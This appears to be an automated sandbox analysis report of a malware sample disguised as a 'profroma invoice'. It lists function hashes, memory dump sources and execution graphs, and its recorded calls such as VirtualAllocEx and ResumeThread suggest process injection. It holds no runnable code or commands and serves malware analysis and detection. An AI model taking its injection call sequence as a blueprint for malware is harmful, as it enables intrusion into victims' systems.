                                                          • Snapshot File: hcaresult_0_2_5d40000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: 3fe5b31c303080ccc0ec07ca7756fb276f8331899b0b64d636e6392f20111405
                                                          • Instruction ID: 00f8e7f1ddf3bd4fd6bc7a2e0260b2e4433407cb7bbd6a84f450f574268eb16f
                                                          • Opcode Fuzzy Hash: 3fe5b31c303080ccc0ec07ca7756fb276f8331899b0b64d636e6392f20111405
                                                          • Instruction Fuzzy Hash: B12116B1C003499FCB10DFAAC845ADEFBF5FF48310F50842AE559A7250C7749544DBA1
                                                          Function 07BD1254 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 360 7bd1254-7bd3534 CreateIconFromResourceEx 362 7bd353d-7bd355a 360->362 363 7bd3536-7bd353c 360->363 363->362
                                                          APIs
                                                          • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07BD3482,?,?,?,?,?), ref: 07BD3527
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2284192471.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7bd0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: CreateFromIconResource
                                                          • String ID:
                                                          • API String ID: 3668623891-0
                                                          • Opcode ID: c15cd1f8387a8d01dd252b1829902de6e867da6ad248ee59a8ac53a83e01585c
                                                          • Instruction ID: b0aa3371b187e02fef0470721e9958a72ff34dfa6e4219806520bdd0a942c96a
                                                          • Opcode Fuzzy Hash: c15cd1f8387a8d01dd252b1829902de6e867da6ad248ee59a8ac53a83e01585c
                                                          • Instruction Fuzzy Hash: CB1137B5800349DFDB10DF9AD844BDEBFF8EB48320F14845AE914A7210D379A954DFA5
                                                          Function 05D4E740 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 366 5d4e740-5d4e7bb VirtualAllocEx 369 5d4e7c4-5d4e7e9 366->369 370 5d4e7bd-5d4e7c3 366->370 370->369
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05D4E7AE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2283225141.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d40000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 3bafa4da0d3ef837cb5ded3af34b297c714fe2380a2f13baa7885565e1d499f7
                                                          • Instruction ID: ff02a8d143310c5710a2e1a01e18804bfff1b6db525fd2a03a7706252d4b8033
                                                          • Opcode Fuzzy Hash: 3bafa4da0d3ef837cb5ded3af34b297c714fe2380a2f13baa7885565e1d499f7
                                                          • Instruction Fuzzy Hash: 7E112676D002499FCB10DFAAC845ADFBFF9EB88324F10841AE519A7250C775A944DFA1
                                                          Function 05D4E180 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 374 5d4e180-5d4e1ef ResumeThread 377 5d4e1f1-5d4e1f7 374->377 378 5d4e1f8-5d4e21d 374->378 377->378
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2283225141.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d40000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: f81ac28bf6ca7c5b8ad010bea470b4c014a1c3eaba88489bc56accd9708e8941
                                                          • Instruction ID: b8ae3a7b4d87a8cc1c3f20e1d2ce47c788c0c864346ba25de41528abcca5c487
                                                          • Opcode Fuzzy Hash: f81ac28bf6ca7c5b8ad010bea470b4c014a1c3eaba88489bc56accd9708e8941
                                                          • Instruction Fuzzy Hash: AF1113B1D003498BDB20DFAAC4456DEFBF9EB88324F20841AD419A7240CB75A944CBA1
                                                          Function 080C1190 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 382 80c1190-80c1202 PostMessageW 384 80c120b-80c121f 382->384 385 80c1204-80c120a 382->385 385->384
                                                          APIs
                                                          • PostMessageW.USER32(?,?,?,?), ref: 080C11F5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2284525402.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_80c0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: MessagePost
                                                          • String ID:
                                                          • API String ID: 410705778-0
                                                          • Opcode ID: 4985884abc32b0a8f341abd512fc460aefad9c613277c3596a8395824299f8a7
                                                          • Instruction ID: 34800c3e5cf81e565c079bd534753843bdf8801608bbe4e4a0e90bc7b17f04e6
                                                          • Opcode Fuzzy Hash: 4985884abc32b0a8f341abd512fc460aefad9c613277c3596a8395824299f8a7
                                                          • Instruction Fuzzy Hash: 0D11D6B58003499FDB10DF9AD885BDEBBF8FB48311F108419D558A7301C375A954CFA5
                                                          Function 080C1198 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 387 80c1198-80c1202 PostMessageW 388 80c120b-80c121f 387->388 389 80c1204-80c120a 387->389 389->388
                                                          APIs
                                                          • PostMessageW.USER32(?,?,?,?), ref: 080C11F5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2284525402.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_80c0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: MessagePost
                                                          • String ID:
                                                          • API String ID: 410705778-0
                                                          • Opcode ID: 13a7e3566ef6e1247f7673a9534098baf82dadbbab95924fda1c9d854d308e06
                                                          • Instruction ID: 4a3f9ebf31b69a66a032ea87f9d6e02f2e53e40edcb7c1fed921b31321d9b14f
                                                          • Opcode Fuzzy Hash: 13a7e3566ef6e1247f7673a9534098baf82dadbbab95924fda1c9d854d308e06
                                                          • Instruction Fuzzy Hash: F011D3B58003499FDB20DF9AD845BDEBBF8FB48311F10841AD918A7300C375A554CFA1
                                                          Function 07BD4BD4 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07BD54C9,?,?), ref: 07BD5A78
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2284192471.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7bd0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: fc651fee29953eed37c910d22708a6c345305a69633c05aa16a58e57df3e4c15
                                                          • Instruction ID: dd839948a0161a893e44c4901815b0a9adc528831303b1705c681122f2900a03
                                                          • Opcode Fuzzy Hash: fc651fee29953eed37c910d22708a6c345305a69633c05aa16a58e57df3e4c15
                                                          • Instruction Fuzzy Hash: 441125B58003599FDB20DF99C489BEEBBF4EF48320F10845AD919A7340D378A944CFA5
                                                          Function 07BD5A18 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07BD54C9,?,?), ref: 07BD5A78
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2284192471.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7bd0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: 71443b5223b895064eb4513530bee8a78b9d0c8707fe1eeaf57b99c02b558500
                                                          • Instruction ID: 6a8b3e1e53b55f9291a62f692db2f3c3b463dd39cd0b5f6f340c5e3bd2b51755
                                                          • Opcode Fuzzy Hash: 71443b5223b895064eb4513530bee8a78b9d0c8707fe1eeaf57b99c02b558500
                                                          • Instruction Fuzzy Hash: 3B1113B58003499FDB20DF9AD489BDEBFF4EB48320F11845AD918A7340D378AA45CFA5
                                                          Function 0134D3D8 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2279394401.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_134d000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3c0ebb05277da5783e1228babb70b57073836395c0220409a1faf00e65a8d7bc
                                                          • Instruction ID: 42dc71e1655d5dd9e428ee4da0b637b2d4dfb5d5d19a8523a809509164514529
                                                          • Opcode Fuzzy Hash: 3c0ebb05277da5783e1228babb70b57073836395c0220409a1faf00e65a8d7bc
                                                          • Instruction Fuzzy Hash: 822148B1504204DFDB01DF58D9C0B56BFA9FBA4328F24C56DE90A1B356C73AF416CAA1
                                                          Function 0135D1D4 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2279424817.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_135d000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f6af9ff0589b6114f1e473064ba6d39237aaca3bbd16f08489b8d31eb3f18e7e
                                                          • Instruction ID: c36cc851cfb18a78ef483198b9afbb4f5d0b8c8bcf0a3c97ee53fe05db17ebc4
                                                          • Opcode Fuzzy Hash: f6af9ff0589b6114f1e473064ba6d39237aaca3bbd16f08489b8d31eb3f18e7e
                                                          • Instruction Fuzzy Hash: 312104B1504204EFDB45DF98D9C0F26BBA5FB84728F24C56DED094B352C376D446CA61
                                                          Function 0135D01C Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2279424817.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_135d000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c02a32ce375b165caee2b2ea362b662dc296444b2dd93dea57805cd7e14d93f8
                                                          • Instruction ID: fb2cdd2a6c22269e748212e7a0147bd20a4fbc1c6245cb421d8dae0a0cc7713a
                                                          • Opcode Fuzzy Hash: c02a32ce375b165caee2b2ea362b662dc296444b2dd93dea57805cd7e14d93f8
                                                          • Instruction Fuzzy Hash: 2C2100B1604204DFDB55DF58D9C0F26BBA5EB84718F24C56DDC0A4B246C33AD407CA61
                                                          Function 0135D006 Relevance: .1, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2279424817.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_135d000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e9ee61f88a3edd1b2e32f051b04453cd46612053755c1fc5b11436b5427df27f
                                                          • Instruction ID: 1aba4288a7403c2b41ef134fcfcc54fbd107f078f22d34fd36f443fc974c52da
                                                          • Opcode Fuzzy Hash: e9ee61f88a3edd1b2e32f051b04453cd46612053755c1fc5b11436b5427df27f
                                                          • Instruction Fuzzy Hash: 8121A1755093808FDB03CF24D994B15BF71EB45218F28C5EAD8498B6A7C33AD40ACB62
                                                          Function 0134D3D3 Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2279394401.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_134d000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                          • Instruction ID: 27e8c99b12526c874347b979ae5e372910f9f8913613eae9dc02827ddec11af0
                                                          • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                          • Instruction Fuzzy Hash: 1211DF76404240CFDB02CF54D5C4B56BFB1FB94324F24C2A9D9090B756C33AE45ACBA1
                                                          Function 0135D1CF Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2279424817.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_135d000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                          • Instruction ID: b1b4e4aad7896890ee910757ad3720a3fef4ed54298a2b5aa6f9ccdce50ce1ba
                                                          • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                          • Instruction Fuzzy Hash: 4A11BB75904280DFDB02CF54D5C4B15BBB1FB84628F24C6ADDC494B696C33AD44ACB61
                                                          Function 0134D745 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2279394401.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_134d000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6b08440bdf9b9d7050c5be701ce75ffb6cc17f05fc51fa3ce9d09f9246de61c1
                                                          • Instruction ID: a6e173a35cbb480ed63198cad2623a0898fc1d7b8d4a31b9f43423fd5cf571df
                                                          • Opcode Fuzzy Hash: 6b08440bdf9b9d7050c5be701ce75ffb6cc17f05fc51fa3ce9d09f9246de61c1
                                                          • Instruction Fuzzy Hash: 80012B710043849BE710DF99CDC4B67BFDCDF51328F18C51AED094A286C379A840CA71
                                                          Function 0134D744 Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2279394401.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_134d000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bfb93a3818fcf9ab666cf2517508b60a08cdb8bf9100c658fd99a401d4b76b4f
                                                          • Instruction ID: 7341654169c8e85bd22fceca1dddce97de7a66a167ad9bb6b6d45ce0ac2fa870
                                                          • Opcode Fuzzy Hash: bfb93a3818fcf9ab666cf2517508b60a08cdb8bf9100c658fd99a401d4b76b4f
                                                          • Instruction Fuzzy Hash: 9CF0C2714043809FE7108E19CD88B62FFD8EB51238F18C45AED084A386C379A844CAB0

                                                          Non-executed Functions

                                                          Function 07BDCD48 Relevance: 2.2, Strings: 1, Instructions: 901COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2284192471.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7bd0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PHcq
                                                          • API String ID: 0-4245845256
                                                          • Opcode ID: 69c9303694c9f04910215c711bd1b6ca9763faa1182a7df4369c9b60f54b2f76
                                                          • Instruction ID: e4e47c2002edf21e3b34134da133bd89d284b9455814205571e392be8f50577b
                                                          • Opcode Fuzzy Hash: 69c9303694c9f04910215c711bd1b6ca9763faa1182a7df4369c9b60f54b2f76
                                                          • Instruction Fuzzy Hash: 21726EB0F0121ACFDB14DFA8C984AADBBB1FF89300F15859AD449AB255E730AD91CF51
                                                          Function 05D4C660 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2283225141.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d40000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b3f75bb4cb84f03b99b800ed72387e3eca04fc2b38e32955bf4d097b3032e17c
                                                          • Instruction ID: a375a5a6fb0687531cb5953e44af8e3e81340bd413c9b61d8c7d66c09f71117c
                                                          • Opcode Fuzzy Hash: b3f75bb4cb84f03b99b800ed72387e3eca04fc2b38e32955bf4d097b3032e17c
                                                          • Instruction Fuzzy Hash: 7FE10774E112599FCB14DFA8C5849AEBBF2FF89304F24816AD454AB326D730AD41CF61
                                                          Function 05D4E308 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2283225141.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d40000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c391d7a81e7c3b0ca77b35beecd8613c011f7e4bd129a6b308c4e6861fa80148
                                                          • Instruction ID: 0529a22c119b56f1876962dfc9c8770ebc726b94ca303ac75eb1c73fb50facab
                                                          • Opcode Fuzzy Hash: c391d7a81e7c3b0ca77b35beecd8613c011f7e4bd129a6b308c4e6861fa80148
                                                          • Instruction Fuzzy Hash: A0E1F674E042599FCB14DFA9C5849AEFBF2FF88304F2481AAE454AB356D730A941CF61
                                                          Function 05D4C228 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2283225141.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d40000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 64c92d59745ef8e39c79855a0d7bafc098b2a1d7752984a7749bbc23df6683f8
                                                          • Instruction ID: 2cf74df714ecc0c1009b9179ad9b039e7bcc95242b3e1ea00cbe582bc305abf9
                                                          • Opcode Fuzzy Hash: 64c92d59745ef8e39c79855a0d7bafc098b2a1d7752984a7749bbc23df6683f8
                                                          • Instruction Fuzzy Hash: F4E1F674E152598FCB14DFA8C5849AEBBF2FF89304F24816AD414AB366D730AD41CFA1
                                                          Function 05D4D900 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2283225141.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d40000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d5c93cfc43ef405325c40b7ec32d0265b5f03d330de8ad7570f37dcdedb7cb97
                                                          • Instruction ID: cda0d5259923fd69b5af9a5395765ba61ad1bb9317cbf5e1dc043c15f64b3a9d
                                                          • Opcode Fuzzy Hash: d5c93cfc43ef405325c40b7ec32d0265b5f03d330de8ad7570f37dcdedb7cb97
                                                          • Instruction Fuzzy Hash: F8E1F774E042598FCB14DFA9C5849AEFBF2FF89304F2481AAE454AB356D730A941CF61
                                                          Function 080C06A3 Relevance: .0, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2284525402.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_80c0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dfdb287358d58da26a684f54438cbaf62d61e4f4347fdf3f38357dc4f6b3b3c3
                                                          • Instruction ID: 6a7b1b1447f5ab52ec1e02a78a7cc80f3ce039abdb27835604647c1bf8251b45
                                                          • Opcode Fuzzy Hash: dfdb287358d58da26a684f54438cbaf62d61e4f4347fdf3f38357dc4f6b3b3c3
                                                          • Instruction Fuzzy Hash: EFC08C66E8D408DAC9100FCC28000FCFB7DCB8B023F0830AAC50EA312388009126D104

                                                          Execution Graph

                                                          Execution Coverage:1.1%
                                                          Dynamic/Decrypted Code Coverage:5.3%
                                                          Signature Coverage:8.3%
                                                          Total number of Nodes:132
                                                          Total number of Limit Nodes:10
                                                          execution_graph 95143 42c403 95144 42c41d 95143->95144 95147 1762df0 LdrInitializeThunk 95144->95147 95145 42c445 95147->95145 95148 4250c3 95149 4250df 95148->95149 95150 425107 95149->95150 95151 42511b 95149->95151 95152 42ce23 NtClose 95150->95152 95158 42ce23 95151->95158 95154 425110 95152->95154 95155 425124 95161 42f033 RtlAllocateHeap 95155->95161 95157 42512f 95159 42ce3d 95158->95159 95160 42ce4e NtClose 95159->95160 95160->95155 95161->95157 95162 401b81 95163 401b86 95162->95163 95166 430483 95163->95166 95169 42ea93 95166->95169 95170 42eab7 95169->95170 95181 407613 95170->95181 95172 42eae0 95173 401c1a 95172->95173 95184 41b793 95172->95184 95175 42eaff 95176 42eb14 95175->95176 95199 42d1e3 95175->95199 95195 428993 95176->95195 95179 42eb2e 95180 42d1e3 ExitProcess 95179->95180 95180->95173 95182 407620 95181->95182 95202 416af3 95181->95202 95182->95172 95185 41b7bf 95184->95185 95230 41b683 95185->95230 95188 41b804 95191 42ce23 NtClose 95188->95191 95192 41b820 95188->95192 95189 41b7ec 95190 42ce23 NtClose 95189->95190 95193 41b7f7 95189->95193 95190->95193 95194 41b816 95191->95194 95192->95175 95193->95175 95194->95175 95196 4289f4 95195->95196 95197 428a01 95196->95197 95241 418cb3 95196->95241 95197->95179 95200 42d200 95199->95200 95201 42d211 ExitProcess 95200->95201 95201->95176 95204 416b10 95202->95204 95203 416b29 95203->95182 95204->95203 95209 42d863 95204->95209 95206 416b84 95206->95203 95216 4296b3 NtClose LdrInitializeThunk 95206->95216 95208 416bd5 95208->95182 95211 42d87d 95209->95211 95210 42d8ac 95210->95206 95211->95210 95217 42c453 95211->95217 95216->95208 95218 42c46d 95217->95218 95224 1762c0a 95218->95224 95219 42c499 95221 42ef13 95219->95221 95227 42d193 95221->95227 95223 42d925 95223->95206 95225 1762c1f LdrInitializeThunk 95224->95225 95226 1762c11 95224->95226 95225->95219 95226->95219 95228 42d1b0 95227->95228 95229 42d1c1 RtlFreeHeap 95228->95229 95229->95223 95231 41b69d 95230->95231 95235 41b779 95230->95235 95236 42c4f3 95231->95236 95234 42ce23 NtClose 95234->95235 95235->95188 95235->95189 95237 42c50d 95236->95237 95240 17635c0 LdrInitializeThunk 95237->95240 95238 41b76d 95238->95234 95240->95238 95242 418cdd 95241->95242 95243 42ef13 RtlFreeHeap 95242->95243 95246 4191eb 95242->95246 95244 418e22 95243->95244 95245 42d1e3 ExitProcess 95244->95245 95244->95246 95245->95246 95246->95197 95254 425453 95258 42546c 95254->95258 95255 4254b4 95256 42ef13 RtlFreeHeap 95255->95256 95257 4254c4 95256->95257 95258->95255 95259 4254f4 95258->95259 95261 4254f9 95258->95261 95260 42ef13 RtlFreeHeap 95259->95260 95260->95261 95262 42ffb3 95263 42ffc3 95262->95263 95264 42ffc9 95262->95264 95267 42eff3 95264->95267 95266 42ffef 95270 42d143 95267->95270 95269 42f00e 95269->95266 95271 42d15d 95270->95271 95272 42d16e RtlAllocateHeap 95271->95272 95272->95269 95247 41b983 95248 41b9c7 95247->95248 95249 41b9e8 95248->95249 95250 42ce23 NtClose 95248->95250 95250->95249 95273 414653 95274 41466d 95273->95274 95276 41468b 95274->95276 95279 417e43 95274->95279 95277 4146d0 95276->95277 95278 4146bf PostThreadMessageW 95276->95278 95278->95277 95280 417e67 95279->95280 95281 417e6e 95280->95281 95282 417ea6 LdrLoadDll 95280->95282 95281->95276 95282->95281 95283 41ac13 95284 41ac85 95283->95284 95285 41ac2b 95283->95285 95285->95284 95287 41eb83 95285->95287 95288 41eba9 95287->95288 95292 41eca0 95288->95292 95293 4300e3 95288->95293 95290 41ec3e 95291 42c453 LdrInitializeThunk 95290->95291 95290->95292 95291->95292 95292->95284 95294 430053 95293->95294 95295 4300b0 95294->95295 95296 42eff3 RtlAllocateHeap 95294->95296 95295->95290 95297 43008d 95296->95297 95298 42ef13 RtlFreeHeap 95297->95298 95298->95295 95299 1762b60 LdrInitializeThunk 95251 419408 95252 42ce23 NtClose 95251->95252 95253 419412 95252->95253 95300 41415e 95301 4140ea 95300->95301 95304 42d0a3 95301->95304 95305 42d0c0 95304->95305 95308 1762c70 LdrInitializeThunk 95305->95308 95306 4140f5 95308->95306

                                                          Executed Functions

                                                          Function 00417E43 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 215 417e43-417e6c call 42faf3 218 417e72-417e80 call 4300f3 215->218 219 417e6e-417e71 215->219 222 417e90-417ea1 call 42e563 218->222 223 417e82-417e8d call 430393 218->223 228 417ea3-417eb7 LdrLoadDll 222->228 229 417eba-417ebd 222->229 223->222 228->229
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417EB5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2807926965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_profroma invoice.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                          • Instruction ID: 0239aaf377b2fcb4487d59bb34220ffa315be4273f3f7c08583bd14527f70908
                                                          • Opcode Fuzzy Hash: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                          • Instruction Fuzzy Hash: 0E0175B1E0020DB7DF10DBE1DC42FDEB7B8AB54308F0041A6E90897240F675EB448795
                                                          Function 0042CE23 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 258 42ce23-42ce5c call 404a23 call 42e053 NtClose
                                                          APIs
                                                          • NtClose.NTDLL(?,004169F6,001F0001,?,00000000,?,?,00000104), ref: 0042CE57
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2807926965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_profroma invoice.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                          • Instruction ID: 33cbf207f0ed10b52c0e063f06a2fa8859cf4e21cf3480f9a20cea2f9fe365d9
                                                          • Opcode Fuzzy Hash: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                          • Instruction Fuzzy Hash: 16E04F762102147BC520EA5ADC01FDBB75CEBC5754F004419FA0867145C6B57A0187E4
                                                          Function 01762B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule

